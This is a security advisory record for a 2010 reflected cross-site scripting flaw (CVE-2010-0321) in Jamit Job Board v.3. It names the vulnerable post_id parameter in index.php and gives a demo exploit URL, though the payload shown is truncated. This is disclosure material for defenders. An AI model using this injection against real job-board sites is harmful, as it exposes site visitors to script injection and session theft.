Topic : | Jamit Job Board v.3 Cross-site Scripting
|
SecurityAlert : 6949
CVE : CVE-2010-0321
CWE : CWE-79
SecurityRisk : Low (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : null
Published : 17.01.2010
Affected Software : | Jamit Job Board v.3 |
 Advisory Content :
##########################################################
[+] Exploit Title: Jamit Job Board v.3
[+] Date: January 09 2010
[+] Author: Crux [mail:cruxtheking@live.com]
[+] Software Link: http://www.jamit.com/jobs/
[+] Version: 3.0
[+] Tested on: ALL
[+] Dork: NO NO NO!
[ Vulnerable File ]
index.php
(The post variable, post_id)
[ EXPLOIT ]
">
[ DEMO ]
http://sitename.com/jobs/index.php?type=111-222-1933email@address.tst&mode=
view&pin_x=0&pin_y=0&post_id=1>">
[+] Greetz to the peeps at hack-tech.com.
##########################################################
References :
http://xforce.iss.net/xforce/xfdb/55500
http://www.securityfocus.com/bid/37701
http://www.exploit-db.com/exploits/11073
http://secunia.com/advisories/32797
http://packetstormsecurity.org/1001-exploits/jamitjobboard-xss.txt
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|